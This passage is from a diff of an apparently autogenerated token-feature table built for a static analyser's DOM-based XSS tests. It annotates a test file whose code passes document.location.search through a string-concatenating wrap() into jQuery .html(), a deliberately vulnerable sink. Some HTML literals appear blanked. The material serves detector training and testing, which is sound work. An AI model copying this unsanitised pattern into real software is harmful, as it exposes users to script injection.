    | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | 'arguments' object of function wrap | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | 'arguments' object of function wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | exceptional return of function wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | exceptional return of function wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | exceptional return of function wrap | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | exceptional return of function wrap | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | exceptional return of function wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | functio ... iv>";\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | functio ... iv>";\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | functio ... iv>";\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | return of function wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | return of function wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | return of function wrap | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | return of function wrap | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | return of function wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:10:42:13 | wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:15:42:15 | s | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | enclosingFunctionBody | s
    s
    | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | enclosingFunctionName | wrap | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:43:10:43:16 | "
    " | stringConcatenatedWith | -endpoint- s + '
    ' | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:20 | "
    " + s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:20 | "
    " + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:20 | "
    " + s | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:20 | "
    " + s | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:20 | "
    " + s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:31 | "
    " ...
    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:31 | "
    " ...
    " | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:31 | "
    " ...
    " | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:31 | "
    " ...
    " | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:43:10:43:31 | "
    " ...
    " | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:43:20:43:20 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:43:20:43:20 | s | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/DomBasedXss/tst.js:43:20:43:20 | s | enclosingFunctionBody | s
    s
    | @@ -16138,16 +112673,134 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:43:24:43:31 | "
    " | enclosingFunctionName | wrap | | autogenerated/Xss/DomBasedXss/tst.js:43:24:43:31 | "
    " | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:43:24:43:31 | "
    " | stringConcatenatedWith | '
    ' + s -endpoint- | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | $('myId ... earch)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | exceptional return of $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | exceptional return of $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:1:46:46 | exceptional return of $('myId ... earch)) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:46:3:46:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:46:3:46:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:46:3:46:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:46:3:46:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:46:3:46:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:11:46:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:11:46:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:11:46:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:19 | wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:19 | wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:19 | wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | exceptional return of wrap(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | exceptional return of wrap(do ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | exceptional return of wrap(do ... search) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | wrap(do ... search) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | wrap(do ... search) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | wrap(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | wrap(do ... search) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:46:16:46:45 | wrap(do ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:28 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:28 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:28 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:37 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:37 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:37 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:44 | documen ... .search | CalleeFlexibleAccessPath | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:44 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:44 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:44 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:21:46:44 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:30:46:37 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:30:46:37 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:30:46:37 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:46:39:46:44 | search | contextFunctionInterfaces | 